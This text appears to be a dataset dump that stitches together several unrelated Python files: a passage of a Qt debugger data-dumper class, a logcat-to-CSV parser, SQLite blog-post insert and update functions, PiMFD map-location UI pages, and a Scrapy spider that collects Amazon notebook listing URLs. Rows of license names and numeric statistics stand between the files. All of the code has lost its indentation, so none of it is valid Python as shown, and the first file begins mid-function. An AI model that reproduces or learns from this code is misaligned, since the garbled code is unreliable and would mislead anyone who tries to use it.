for i in range(methodCount):
k = methodNames[i]
with SubItem(self, k):
self.putEmptyValue()
with SubItem(self, "[signals]"):
signalCount = self.staticQObjectSignalCount(smo)
self.putItemCount(signalCount)
if self.isExpanded():
signalNames = self.staticQObjectSignalNames(smo)
signalCount = len(signalNames)
with Children(self):
for i in range(signalCount):
k = signalNames[i]
with SubItem(self, k):
self.putEmptyValue()
self.putQObjectConnections(qobject)
def putQObjectConnections(self, qobject):
with SubItem(self, "[connections]"):
ptrSize = self.ptrSize()
self.putNoType()
ns = self.qtNamespace()
privateTypeName = ns + "QObjectPrivate"
privateType = self.lookupType(privateTypeName)
dd = qobject["d_ptr"]["d"]
d_ptr = dd.cast(privateType.pointer()).dereference()
connections = d_ptr["connectionLists"]
if self.isNull(connections):
self.putItemCount(0)
else:
connections = connections.dereference()
connections = connections.cast(self.directBaseClass(connections.type))
self.putSpecialValue("minimumitemcount", 0)
self.putNumChild(1)
if self.isExpanded():
pp = 0
with Children(self):
innerType = self.templateArgument(connections.type, 0)
# Should check: innerType == ns::QObjectPrivate::ConnectionList
base = self.extractPointer(connections)
data, size, alloc = self.vectorDataHelper(base)
connectionType = self.lookupType(ns + "QObjectPrivate::Connection")
for i in xrange(size):
first = self.extractPointer(data + i * 2 * ptrSize)
while first:
self.putSubItem("%s" % pp,
self.createPointerValue(first, connectionType))
first = self.extractPointer(first + 3 * ptrSize)
# We need to enforce some upper limit.
pp += 1
if pp > 1000:
break
def isKnownMovableType(self, typeName):
if typeName in (
"QBrush", "QBitArray", "QByteArray", "QCustomTypeInfo", "QChar", "QDate",
"QDateTime", "QFileInfo", "QFixed", "QFixedPoint", "QFixedSize",
"QHashDummyValue", "QIcon", "QImage", "QLine", "QLineF", "QLatin1Char",
"QLocale", "QMatrix", "QModelIndex", "QPoint", "QPointF", "QPen",
"QPersistentModelIndex", "QResourceRoot", "QRect", "QRectF", "QRegExp",
"QSize", "QSizeF", "QString", "QTime", "QTextBlock", "QUrl", "QVariant",
"QXmlStreamAttribute", "QXmlStreamNamespaceDeclaration",
"QXmlStreamNotationDeclaration", "QXmlStreamEntityDeclaration"
):
return True
return typeName == "QStringList" and self.qtVersion() >= 0x050000
def currentItemFormat(self, type = None):
displayFormat = self.formats.get(self.currentIName, AutomaticFormat)
if displayFormat == AutomaticFormat:
if type is None:
type = self.currentType.value
needle = self.stripForFormat(str(type))
displayFormat = self.typeformats.get(needle, AutomaticFormat)
return displayFormat
def putArrayData(self, base, n, innerType,
childNumChild = None, maxNumChild = 10000):
addrBase = toInteger(base)
innerSize = innerType.sizeof
enc = self.simpleEncoding(innerType)
if enc:
self.put('childtype="%s",' % innerType)
self.put('addrbase="0x%x",' % addrBase)
self.put('addrstep="0x%x",' % innerSize)
self.put('arrayencoding="%s",' % enc)
if n > maxNumChild:
self.put('childrenelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
self.put('arraydata="')
self.put(self.readMemory(addrBase, n * innerSize))
self.put('",')
else:
with Children(self, n, innerType, childNumChild, maxNumChild,
addrBase=addrBase, addrStep=innerSize):
for i in self.childRange():
self.putSubItem(i, self.createValue(addrBase + i * innerSize, innerType))
def putArrayItem(self, name, addr, n, typeName):
with SubItem(self, name):
self.putEmptyValue()
self.putType("%s [%d]" % (typeName, n))
self.putArrayData(addr, n, self.lookupType(typeName))
self.putAddress(addr)
def putPlotDataHelper(self, base, n, innerType, maxNumChild = 1000*1000):
if n > maxNumChild:
self.put('plotelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
if self.currentItemFormat() == ArrayPlotFormat and self.isSimpleType(innerType):
enc = self.simpleEncoding(innerType)
if enc:
self.putField("editencoding", enc)
self.putDisplay("plotdata:separate",
self.readMemory(base, n * innerType.sizeof))
def putPlotData(self, base, n, innerType, maxNumChild = 1000*1000):
self.putPlotDataHelper(base, n, innerType, maxNumChild=maxNumChild)
if self.isExpanded():
self.putArrayData(base, n, innerType, maxNumChild=maxNumChild)
def putSpecialArgv(self, value):
"""
Special handling for char** argv.
"""
n = 0
p = value
# p is 0 for "optimized out" cases. Or contains rubbish.
try:
if not self.isNull(p):
while not self.isNull(p.dereference()) and n <= 100:
p += 1
n += 1
except:
pass
with TopLevelItem(self, 'local.argv'):
self.put('iname="local.argv",name="argv",')
self.putItemCount(n, 100)
self.putType('char **')
if self.currentIName in self.expandedINames:
p = value
with Children(self, n):
for i in xrange(n):
self.putSubItem(i, p.dereference())
p += 1
def extractPointer(self, thing, offset = 0):
if isinstance(thing, int):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif sys.version_info[0] == 2 and isinstance(thing, long):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif isinstance(thing, Blob):
rawBytes = thing.toBytes()
else:
# Assume it's a (backend specific) Value.
rawBytes = self.toBlob(thing).toBytes()
code = "I" if self.ptrSize() == 4 else "Q"
return struct.unpack_from(code, rawBytes, offset)[0]
# Parses a..b and a.(s).b
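# For illustration (made-up expression, assuming the debugger evaluates the
# literals): parseRange("a[1..3]") -> (True, 1, 1, 4, "a[%s]"), i.e. a range
# from 1 up to (but excluding) 4 with stride 1 plus the item template.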
def parseRange(self, exp):
# Search for the first unbalanced delimiter in s
def searchUnbalanced(s, upwards):
paran = 0
bracket = 0
if upwards:
open_p, close_p, open_b, close_b = '(', ')', '[', ']'
else:
open_p, close_p, open_b, close_b = ')', '(', ']', '['
for i in range(len(s)):
c = s[i]
if c == open_p:
paran += 1
elif c == open_b:
bracket += 1
elif c == close_p:
paran -= 1
if paran < 0:
return i
elif c == close_b:
bracket -= 1
if bracket < 0:
return i
return len(s)
match = re.search("(\.)(\(.+?\))?(\.)", exp)
if match:
s = match.group(2)
left_e = match.start(1)
left_s = 1 + left_e - searchUnbalanced(exp[left_e::-1], False)
right_s = match.end(3)
right_e = right_s + searchUnbalanced(exp[right_s:], True)
template = exp[:left_s] + '%s' + exp[right_e:]
a = exp[left_s:left_e]
b = exp[right_s:right_e]
try:
# Allow integral expressions.
ss = toInteger(self.parseAndEvaluate(s[1:len(s)-1]) if s else 1)
aa = toInteger(self.parseAndEvaluate(a))
bb = toInteger(self.parseAndEvaluate(b))
if aa < bb and ss > 0:
return True, aa, ss, bb + 1, template
except:
pass
return False, 0, 1, 1, exp
def putNumChild(self, numchild):
if numchild != self.currentChildNumChild:
self.put('numchild="%s",' % numchild)
def handleWatches(self, args):
for watcher in args.get("watchers", []):
iname = watcher['iname']
exp = self.hexdecode(watcher['exp'])
self.handleWatch(exp, exp, iname)
def handleWatch(self, origexp, exp, iname):
exp = str(exp).strip()
escapedExp = self.hexencode(exp)
#warn("HANDLING WATCH %s -> %s, INAME: '%s'" % (origexp, exp, iname))
# Grouped items separated by semicolon
if exp.find(";") >= 0:
exps = exp.split(';')
n = len(exps)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
for i in xrange(n):
self.handleWatch(exps[i], exps[i], "%s.%d" % (iname, i))
return
# Special array index: e.g a[1..199] or a[1.(3).199] for stride 3.
isRange, begin, step, end, template = self.parseRange(exp)
if isRange:
#warn("RANGE: %s %s %s in %s" % (begin, step, end, template))
r = range(begin, end, step)
n = len(r)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
with Children(self, n):
for i in r:
e = template % i
self.handleWatch(e, e, "%s.%s" % (iname, i))
return
# Fall back to less special syntax
#return self.handleWatch(origexp, exp, iname)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
self.put('wname="%s",' % escapedExp)
try:
value = self.parseAndEvaluate(exp)
self.putItem(value)
except RuntimeError:
self.currentType.value = " "
self.currentValue.value = "<no such value>"
self.currentChildNumChild = -1
self.currentNumChild = 0
self.putNumChild(0)
def registerDumper(self, funcname, function):
try:
if funcname.startswith("qdump__"):
typename = funcname[7:]
spec = inspect.getargspec(function)
if len(spec.args) == 2:
self.qqDumpers[typename] = function
elif len(spec.args) == 3 and len(spec.defaults) == 1:
self.qqDumpersEx[spec.defaults[0]] = function
self.qqFormats[typename] = self.qqFormats.get(typename, [])
elif funcname.startswith("qform__"):
typename = funcname[7:]
try:
self.qqFormats[typename] = function()
except:
self.qqFormats[typename] = []
elif funcname.startswith("qedit__"):
typename = funcname[7:]
try:
self.qqEditable[typename] = function
except:
pass
except:
pass
def setupDumpers(self, _ = {}):
self.resetCaches()
for mod in self.dumpermodules:
m = __import__(mod)
dic = m.__dict__
for name in dic.keys():
item = dic[name]
self.registerDumper(name, item)
msg = "dumpers=["
for key, value in self.qqFormats.items():
editable = ',editable="true"' if key in self.qqEditable else ''
formats = (',formats=\"%s\"' % str(value)[1:-1]) if len(value) else ''
msg += '{type="%s"%s%s},' % (key, editable, formats)
msg += '],'
v = 10000 * sys.version_info[0] + 100 * sys.version_info[1] + sys.version_info[2]
msg += 'python="%d"' % v
return msg
def reloadDumpers(self, args):
for mod in self.dumpermodules:
m = sys.modules[mod]
if sys.version_info[0] >= 3:
import importlib
importlib.reload(m)
else:
reload(m)
self.setupDumpers(args)
def addDumperModule(self, args):
path = args['path']
(head, tail) = os.path.split(path)
sys.path.insert(1, head)
self.dumpermodules.append(os.path.splitext(tail)[0])
def extractQStringFromQDataStream(self, buf, offset):
""" Read a QString from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('utf-16be')
return (string, offset + size)
def extractQByteArrayFromQDataStream(self, buf, offset):
""" Read a QByteArray from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('latin1')
return (string, offset + size)
def extractIntFromQDataStream(self, buf, offset):
""" Read an int from the stream """
value = struct.unpack_from("!I", buf, offset)[0]
return (value, offset + 4)
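# Wire-format note: the QString and QByteArray extractors above read a
# big-endian 32-bit length ("!I") followed by that many payload bytes
# (UTF-16BE text or Latin-1 bytes respectively), while the int extractor
# reads the 4-byte value itself; each returns (value, new_offset).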
def handleInterpreterMessage(self):
""" Return True if inferior stopped """
resdict = self.fetchInterpreterResult()
return resdict.get('event') == 'break'
def reportInterpreterResult(self, resdict, args):
print('interpreterresult=%s,token="%s"'
% (self.resultToMi(resdict), args.get('token', -1)))
def reportInterpreterAsync(self, resdict, asyncclass):
print('interpreterasync=%s,asyncclass="%s"'
% (self.resultToMi(resdict), asyncclass))
def removeInterpreterBreakpoint(self, args):
res = self.sendInterpreterRequest('removebreakpoint', { 'id' : args['id'] })
return res
def insertInterpreterBreakpoint(self, args):
args['condition'] = self.hexdecode(args.get('condition', ''))
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
resdict = args.copy()
bp = None if response is None else response.get("breakpoint", None)
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
self.createResolvePendingBreakpointsHookBreakpoint(args)
resdict['number'] = -1
resdict['pending'] = 1
resdict['warning'] = 'Direct interpreter breakpoint insertion failed.'
self.reportInterpreterResult(resdict, args)
def resolvePendingInterpreterBreakpoint(self, args):
self.parseAndEvaluate('qt_qmlDebugEnableService("NativeQmlDebugger")')
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
resdict = args.copy()
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
resdict['number'] = -1
resdict['pending'] = 0
resdict['error'] = 'Pending interpreter breakpoint insertion failed.'
self.reportInterpreterAsync(resdict, 'breakpointmodified')
def fetchInterpreterResult(self):
buf = self.parseAndEvaluate("qt_qmlDebugMessageBuffer")
size = self.parseAndEvaluate("qt_qmlDebugMessageLength")
msg = self.hexdecode(self.readMemory(buf, size))
# msg is a sequence of 'servicename<space>msglen<space>msg' items.
resdict = {} # Native payload.
while len(msg):
pos0 = msg.index(' ') # End of service name
pos1 = msg.index(' ', pos0 + 1) # End of message length
service = msg[0:pos0]
msglen = int(msg[pos0+1:pos1])
msgend = pos1+1+msglen
payload = msg[pos1+1:msgend]
msg = msg[msgend:]
if service == 'NativeQmlDebugger':
try:
resdict = json.loads(payload)
continue
except:
warn("Cannot parse native payload: %s" % payload)
else:
print('interpreteralien=%s'
% {'service': service, 'payload': self.hexencode(payload)})
try:
expr = 'qt_qmlDebugClearBuffer()'
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Cleaning buffer failed: %s: %s" % (expr, error))
return resdict
def sendInterpreterRequest(self, command, args = {}):
encoded = json.dumps({ 'command': command, 'arguments': args })
hexdata = self.hexencode(encoded)
expr = 'qt_qmlDebugSendDataToService("NativeQmlDebugger","%s")' % hexdata
try:
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
except AttributeError as error:
# Happens with LLDB and 'None' current thread.
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
if not res:
warn("Interpreter command failed: %s " % encoded)
return {}
return self.fetchInterpreterResult()
def executeStep(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepin', args)
self.doContinue()
def executeStepOut(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepout', args)
self.doContinue()
def executeNext(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepover', args)
self.doContinue()
def executeContinue(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('continue', args)
self.doContinue()
def doInsertInterpreterBreakpoint(self, args, wasPending):
#warn("DO INSERT INTERPRETER BREAKPOINT, WAS PENDING: %s" % wasPending)
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
if wasPending:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'error': 'Pending interpreter breakpoint insertion failed.'}, args)
return
else:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'warning': 'Direct interpreter breakpoint insertion failed.'}, args)
self.createResolvePendingBreakpointsHookBreakpoint(args)
return
self.reportInterpreterResult({'bpnr': bp, 'pending': 0}, args)
def isInternalInterpreterFrame(self, functionName):
if functionName is None:
return False
if functionName.startswith("qt_v4"):
return True
return functionName.startswith(self.qtNamespace() + "QV4::")
# Hack to avoid QDate* dumper timeouts with GDB 7.4 on 32 bit
# due to misaligned %ebx in SSE calls (qstring.cpp:findChar)
def canCallLocale(self):
return True
def isReportableInterpreterFrame(self, functionName):
return functionName and functionName.find("QV4::Moth::VME::exec") >= 0
def extractQmlData(self, value):
if value.type.code == PointerCode:
value = value.dereference()
data = value["data"]
return data.cast(self.lookupType(str(value.type).replace("QV4::", "QV4::Heap::")))
# Contains iname, name, and value.
class LocalItem:
pass
def extractInterpreterStack(self):
return self.sendInterpreterRequest('backtrace', {'limit': 10 })
|
gpl-3.0
| 2,995,124,426,568,365,000
| 36.45848
| 103
| 0.55573
| false
| 4.051494
| false
| false
| false
|
chapinb/shattered
|
libs/liblogcat.py
|
1
|
4282
|
#!/usr/bin/env python3
##################################################################################
## ##
## _____ _ _ _ _ ##
## | __| |_ ___| |_| |_ ___ ___ ___ _| | ##
## |__ | | .'| _| _| -_| _| -_| . | ##
## |_____|_|_|__,|_| |_| |___|_| |___|___| ##
## ##
## ##
## Special Thanks to Julie Desautels, Jon Rajewski, and the LCDI for the ##
## research leading to the success of this script. ##
## ##
## Copyright 2013, Chapin Bryce ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see <http://www.gnu.org/licenses/>. ##
## ##
##################################################################################
## Logcat Parser
"""
This module is designed to parse data within the logcat export from shattered.
Run as a standalone script, the module prompts for an input file and an output file.
The output format is CSV.
e.g. $ python3 logcat_lib.py
"""
import re
import os
import sys
def logcat_version():
"""
Function for calling the version of the code
"""
version = 20140213
print("Logcat Parser version: ", version)
def logcat_parser(inputfile, outputfile):
"""
This function parses the data from a logcat input file into CSV format for easier reading.
Can be run as a standalone script (e.g. ./logcat_lib.py) or imported into another script.
"""
logcat_version()
print("Parsing Logcat File...")
fin = open(inputfile, 'r')
fout = open(outputfile, 'w')
fout.write("Date, Time, PID, Level, Tag, Data")
bucket = ""
logname = re.compile(r'----*')
metainfostart = re.compile(r'^\[ \d')
metainfoend = re.compile(r'\]$')
anytext = re.compile(r'.*')
for line in fin:
line = line.strip()
if logname.findall(line):
print("Processesing Log: " + line)
loginfo = "Processesing Log: " + line
elif metainfoend.findall(line) and metainfostart.findall(line):
meta = line
meta = logcat_meta(meta)
fout.write(meta)
elif anytext.findall(line):
data = line
data = data.strip()
data = data.replace(",", " ")
bucket = data
fout.write(bucket)
fout.flush()
fout.close()
print("####################\nLogcat Processing Complete\n####################")
def logcat_meta(meta):
"""
This function breaks down the metadata information to allow better sorting and
filtering in CSV interpreters.
"""
meta_a = meta.split()
date = meta_a[1]
time = meta_a[2]
pid = meta_a[3]
service = meta_a[4]
service_a = service.split("/")
level = service_a[0]
tag = service_a[1]
meta_out = "\n" + date + "," + time + "," + pid + "," + level + "," + tag + ","
return meta_out
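# Minimal standalone entry point (sketch): the module docstring above says the
# script prompts for an input and an output file when run directly; the exact
# prompt wording used upstream is not shown here, so the prompts below are assumed.
if __name__ == "__main__":
    log_in = input("Path to logcat export file: ")
    csv_out = input("Path for CSV output file: ")
    logcat_parser(log_in, csv_out)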
|
gpl-3.0
| 5,323,526,873,882,407,000
| 35.234783
| 94
| 0.429939
| false
| 4.378323
| false
| false
| false
|
zzir/white
|
update_content.py
|
1
|
3484
|
import sqlite3
from wtforms.fields import StringField, IntegerField
from wtforms import validators
from wtforms_tornado import Form
from config import CONFIG
from get_content import TContents
class CheckContents(Form):
title = StringField(validators=[validators.length(min=1, max=100)])
slug = StringField(validators=[
validators.length(min=1, max=50),
validators.regexp(r"^[A-Za-z0-9_-]*$")
])
tags = StringField(validators=[validators.length(min=1, max=150)])
column = StringField(validators=[validators.length(max=50)], default='')
text = StringField(validators=[validators.length(min=1)])
short = StringField(validators=[validators.length(max=512)], default='')
top = IntegerField(validators=[validators.AnyOf([0,1])], default=0)
feed = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
comment = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
status = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
original = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
def add_contents(title, slug, created, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title = TContents().check_title(title)
same_slug = TContents().check_slug(slug)
if same_title != 'ok':
return "same Title!"
if same_slug != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"insert into blog_contents \
values (Null,?,?,?,?,?,?,?,?,?,?,?,?,?)",
(title, slug, created, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original))
con.commit()
con.close()
return 'ok'
except:
return 'no'
def update_contents(pid, title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title_id = TContents().check_title_id(title,pid)
same_slug_id = TContents().check_slug_id(slug,pid)
if same_title_id != 'ok':
return "same Title!"
if same_slug_id != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"update blog_contents set \
title = ?, \
slug = ?, \
modified = ?, \
tags = ?, \
column = ?, \
text = ?, \
short = ?, \
allow_top = ?, \
allow_comment = ?, \
allow_feed = ?, \
status = ?, \
original=? where id = ?",
(title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original, pid)
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
def DelPost(pid):
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"delete from blog_contents where id =?", (pid, )
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
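# Usage sketch for add_contents (assumes CONFIG['DB_FILE'] already points at a
# database containing the blog_contents table; the field values below are
# purely illustrative).
if __name__ == '__main__':
    result = add_contents(
        title='Hello', slug='hello', created=1518000000, modified=1518000000,
        tags='demo', column='', text='Hello world', short='',
        allow_top=0, allow_comment=1, allow_feed=1, status=1, original=1)
    print(result) # 'ok' on success, 'no' on a database error, or a duplicate warning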
|
mit
| 5,526,406,091,569,730,000
| 30.192661
| 76
| 0.573235
| false
| 3.687636
| false
| false
| false
|
IntegerMan/Pi-MFD
|
PiMFD/Applications/Navigation/MapLocations.py
|
1
|
9253
|
# coding=utf-8
"""
This file contains map locations information
"""
from PiMFD.Applications.MFDPage import MFDPage
from PiMFD.UI.Button import MFDButton
from PiMFD.UI.TextBoxes import TextBox
from PiMFD.UI.Widgets.MenuItem import TextMenuItem
__author__ = 'Matt Eland'
class MapLocation(object):
"""
Represents a location on the map
:param name: The name of the location
:type name: basestring
:param lat: The latitude
:type lat: float
:param lng: The longitude
:type lng: float
"""
name = None
lat = None
lng = None
tags = {}
id = None
def __init__(self, name, lat, lng):
super(MapLocation, self).__init__()
self.name = name
self.lat = lat
self.lng = lng
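# Example (sketch): a location is just a named latitude/longitude pair, e.g.
# MapLocation('Home', 40.0, -82.9); the id attribute defaults to None and is
# assigned by callers such as MapLocationAddPage below.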
class MapLocationAddPage(MFDPage):
id = None
def __init__(self, controller, application, back_page):
super(MapLocationAddPage, self).__init__(controller, application)
self.btn_back = MFDButton("BACK")
self.btn_add_location = MFDButton("ADD")
self.back_page = back_page
self.lbl_header = self.get_header_label('Add Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.data_provider = application.data_provider
self.set_focus(self.txt_name)
def set_values_from_context(self, context):
if context:
self.txt_lat.text = str(context.lat)
self.txt_lng.text = str(context.lng)
self.txt_name.text = context.get_display_name()
self.id = context.id
def get_lower_buttons(self):
return [self.btn_back, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Add
# Actually add the thing
location = MapLocation(self.txt_name.text, self.txt_lat.text, self.txt_lng.text)
location.id = self.id
self.data_provider.add_location(location)
self.application.select_page(self.back_page)
return True
return super(MapLocationAddPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_add_location.enabled = True
else:
self.btn_add_location.enabled = False
return super(MapLocationAddPage, self).arrange()
def render(self):
return super(MapLocationAddPage, self).render()
class MapLocationDetailsPage(MFDPage):
def __init__(self, controller, application, location, back_page):
super(MapLocationDetailsPage, self).__init__(controller, application)
self.location = location
self.btn_back = MFDButton("BACK")
self.btn_save = MFDButton("SAVE")
self.btn_home = MFDButton("HOME")
self.btn_delete = MFDButton("DEL")
self.back_page = back_page
self.lbl_header = self.get_header_label('Edit Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300, text=location.name)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180, text=location.lat)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180, text=location.lng)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.set_focus(self.txt_name)
def get_lower_buttons(self):
return [self.btn_back, self.btn_save, self.btn_home, None, self.btn_delete]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Save
# Actually add the thing
self.location.name = self.txt_name.text
self.location.lat = self.txt_lat.text
self.location.lng = self.txt_lng.text
self.application.data_provider.save_locations()
self.application.select_page(self.back_page)
return True
elif index == 2: # Home
# Set this as home
self.controller.options.lat = float(self.txt_lat.text)
self.controller.options.lng = float(self.txt_lng.text)
return True
elif index == 4: # Delete
# TODO: Once my UI framework has grown a bit more, add confirmation functionality.
self.application.delete_location(self.location)
self.application.select_page(self.back_page)
return True
return super(MapLocationDetailsPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_save.enabled = True
else:
self.btn_save.enabled = False
# Mark as home if it's your home location
try:
if float(self.txt_lat.text) == self.controller.options.lat and \
float(self.txt_lng.text) == self.controller.options.lng:
self.btn_home.selected = True
else:
self.btn_home.selected = False
except:
self.btn_home.selected = False
return super(MapLocationDetailsPage, self).arrange()
def render(self):
return super(MapLocationDetailsPage, self).render()
class MapLocationsPage(MFDPage):
"""
Lists map locations the user has saved
:param controller: The controller
:param application: The navigation application
:param map_context: The map context
"""
def __init__(self, controller, application, map_context, back_page):
super(MapLocationsPage, self).__init__(controller, application)
self.map_context = map_context
self.data_provider = application.data_provider
self.btn_back = MFDButton("BACK")
self.btn_edit_location = MFDButton("EDIT")
self.btn_add_location = MFDButton("NEW")
self.back_page = back_page
def handle_selected(self):
is_first = True
self.clear_focusables()
if self.data_provider.locations and len(self.data_provider.locations) > 0:
self.panel.children = [self.get_header_label('Locations ({})'.format(len(self.data_provider.locations)))]
for l in self.data_provider.locations:
item = TextMenuItem(self.display, self, '{}: {}, {}'.format(l.name, l.lat, l.lng))
item.font = self.display.fonts.list
item.data_context = l
self.panel.children.append(item)
if is_first:
self.set_focus(item)
is_first = False
super(MapLocationsPage, self).handle_selected()
def handle_control_state_changed(self, widget):
location = widget.data_context
if location:
self.application.show_map(location.lat, location.lng)
super(MapLocationsPage, self).handle_control_state_changed(widget)
def get_lower_buttons(self):
return [self.btn_back, self.btn_edit_location, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Edit
if self.focus:
loc = self.focus.data_context
if loc:
self.application.select_page(MapLocationDetailsPage(self.controller, self.application, loc, self))
return True
elif index == 2: # Add
self.application.select_page(MapLocationAddPage(self.controller, self.application, self))
return True
return super(MapLocationsPage, self).handle_lower_button(index)
def get_button_text(self):
return "GOTO"
def arrange(self):
return super(MapLocationsPage, self).arrange()
def render(self):
if not self.data_provider.locations or len(self.data_provider.locations) == 0:
self.center_text("NO LOCATIONS DEFINED")
else:
return super(MapLocationsPage, self).render()
|
gpl-2.0
| -5,634,889,265,219,760,000
| 31.584507
| 118
| 0.608451
| false
| 3.795324
| false
| false
| false
|
Superjom/bad_source
|
python/paper/spider/spider/spiders/amazon_notebook.py
|
1
|
2872
|
# -*- coding: utf-8 -*-
from __future__ import division
import sys
sys.path.append('../../')
import re
import time
import random
import urlparse as up
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.exceptions import CloseSpider
from scrapy.http.request import Request
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from spider.items import SpiderItem
'''
Created on Jul 30, 2013
@author: Chunwei Yan @ pkusz
@mail: yanchunwei@outlook.com
'''
#base_url = r'http://www.amazon.com/*'
root = "/home/chunwei/bad_source/python/paper/spider/spider/spiders"
allowed_url = r'http://www.amazon.com/s/.*keywords=notebook.*'
content_url_format = '//h3[contains(@class,"newaps")]/a[contains(@href,"amazon.com")]/@href'
init_start_urls = [
"http://www.amazon.com/s/ref=sr_nr_n_11?rh=n%3A565108%2Ck%3Anotebook&keywords=notebook&ie=UTF8&qid=1384484919&rnid=2941120011"
]
init_allowed_domains = [
"amazon.com",
]
MAX_SLEEP_TIME = 20
class SpiderSpider(CrawlSpider):
count = 0
name = "amazon_notebook"
allowed_domains = init_allowed_domains
dic = set()
start_urls = init_start_urls
rules = (
#only extract links here
#Rule(SgmlLinkExtractor(allow=allowed_url)),
#extract content here and parse urls
Rule(SgmlLinkExtractor(allow=allowed_url), callback="parse"),
)
@property
def sleep_time(self):
return random.random() * MAX_SLEEP_TIME
def parse(self, response):
'''
extract
title
content
url
'''
print '>'*50
print 'response url: ', response.url
hxs = HtmlXPathSelector(response)
print '>>>> repsonse.url: ', response.url
#get urls
content_urls = hxs.select(content_url_format).extract()
list_urls = hxs.select('//span[contains(@class,"pagnLink")]/a[contains(@href,"keywords=notebook")]/@href').extract()
list_urls = [ up.urljoin(response.url, url) for url in list_urls]
print "@" * 60
time.sleep(self.sleep_time)
self.start_urls.extend(list_urls)
for url in list_urls:
yield Request(url, self.parse)
content_re = re.compile(r'http://www.amazon.com/[^s]+.*&keywords=notebook$')
for url in content_urls:
if content_re.match(url):
if len(self.dic) > 450:
self.start_urls = []
raise CloseSpider('reach pages limit, end the spider.')
self.count += 1
self.dic.add( hash(url))
#extract data
item = SpiderItem()
item['url'] = url
item['kind'] = 'amazon_notebook'
yield item
if __name__ == "__main__":
pass
|
gpl-2.0
| 4,343,573,823,116,785,700
| 26.883495
| 134
